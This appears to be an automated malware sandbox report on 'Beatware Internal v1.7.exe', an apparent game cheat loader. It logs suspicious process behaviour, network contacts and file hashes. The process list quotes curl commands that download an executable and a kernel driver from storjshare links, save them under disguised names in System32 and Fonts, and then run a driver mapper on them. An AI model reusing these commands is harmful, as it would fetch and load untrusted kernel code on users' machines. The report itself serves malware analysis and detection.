N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | N/A

Suspicious behavior: LoadsDriver

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\gainlol.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\gainlol.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2368 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 2372 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 3188 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 3188 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 3188 wrote to memory of 552 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 3188 wrote to memory of 552 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\certutil.exe
PID 3188 wrote to memory of 2800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 3188 wrote to memory of 2800 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 3188 wrote to memory of 1252 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 3188 wrote to memory of 1252 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\find.exe
PID 2368 wrote to memory of 1524 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 1524 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2368 wrote to memory of 1664 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2368 wrote to memory of 3888 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 2368 wrote to memory of 3888 | N/A | C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe | C:\Windows\system32\cmd.exe
PID 1664 wrote to memory of 3216 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 3216 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1976 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 3772 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 3772 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1664 wrote to memory of 1928 | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe

"C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

C:\Windows\system32\certutil.exe

certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Beatware Internal v1.7.exe" MD5

C:\Windows\system32\find.exe

find /i /v "md5"

C:\Windows\system32\find.exe

find /i /v "certutil"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://beatware.xyz/discord

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa756c46f8,0x7ffa756c4708,0x7ffa756c4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4684 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=4656 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5492 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9638122032947638020,3663397467931842393,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe >nul 2>&1

C:\Windows\system32\curl.exe

curl https://link.storjshare.io/s/jwcmolxlugnnediqq4n5nfdfqcha/beatware.xyz0pass123%2Fudmanmapper.exe?download=1 --output C:/Windows/System32/gainlol.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys >nul 2>&1

C:\Windows\system32\curl.exe

curl https://link.storjshare.io/s/jxnohpz53w2wri3ycddt2vg64isa/beatware.xyz0pass123%2Fdriver.sys?download=1 --output C:/Windows/Fonts/arial.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys

C:\Windows\System32\gainlol.exe

C:/Windows/System32/gainlol.exe C:/Windows/Fonts/arial.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll >nul 2>&1

C:\Windows\system32\curl.exe

curl https://link.storjshare.io/s/jx5zf2cuq6hiahyssj4toh36hleq/beatware.xyz0pass123%2Finternal.dll?download=1 --output C:/Windows/System32/internal.dll

Network

Country Destination Domain Proto
N/A 127.0.0.1:58111 tcp
N/A 127.0.0.1:58113 tcp
US 8.8.8.8:53 keyauth.win udp
US 104.26.1.5:443 keyauth.win tcp
US 8.8.8.8:53 5.1.26.104.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 x2.c.lencr.org udp
BE 23.55.97.11:80 x2.c.lencr.org tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 beatware.xyz udp
US 104.21.71.116:443 beatware.xyz tcp
US 8.8.8.8:53 dsc.gg udp
US 104.21.7.223:443 dsc.gg tcp
US 8.8.8.8:53 116.71.21.104.in-addr.arpa udp
US 8.8.8.8:53 r.dsc.gg udp
US 172.67.156.126:443 r.dsc.gg tcp
US 8.8.8.8:53 discord.gg udp
US 162.159.135.234:443 discord.gg tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 126.156.67.172.in-addr.arpa udp
US 8.8.8.8:53 223.7.21.104.in-addr.arpa udp
US 8.8.8.8:53 234.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
US 8.8.8.8:53 1.80.190.35.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:6463 tcp
N/A 127.0.0.1:6464 tcp
N/A 127.0.0.1:6465 tcp
N/A 127.0.0.1:6466 tcp
N/A 127.0.0.1:6467 tcp
N/A 127.0.0.1:6468 tcp
N/A 127.0.0.1:6469 tcp
N/A 127.0.0.1:6470 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
N/A 127.0.0.1:6471 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 127.0.0.1:6472 tcp
US 8.8.8.8:53 24.121.18.2.in-addr.arpa udp
US 104.26.1.5:443 keyauth.win tcp
N/A 127.0.0.1:58918 tcp
N/A 127.0.0.1:58920 tcp
US 8.8.8.8:53 link.storjshare.io udp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 99.23.217.172.in-addr.arpa udp
US 136.0.77.2:443 link.storjshare.io tcp

Files

memory/2368-2-0x00007FF703D45000-0x00007FF7040AE000-memory.dmp

memory/2368-0-0x00007FFA934D0000-0x00007FFA934D2000-memory.dmp

memory/2368-1-0x00007FF703CB0000-0x00007FF70462B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4158365912175436289496136e7912c2
SHA1 813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256 354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA512 74b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b

\??\pipe\LOCAL\crashpad_1664_PHBJICYFAMBTWROL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 ce4c898f8fc7601e2fbc252fdadb5115
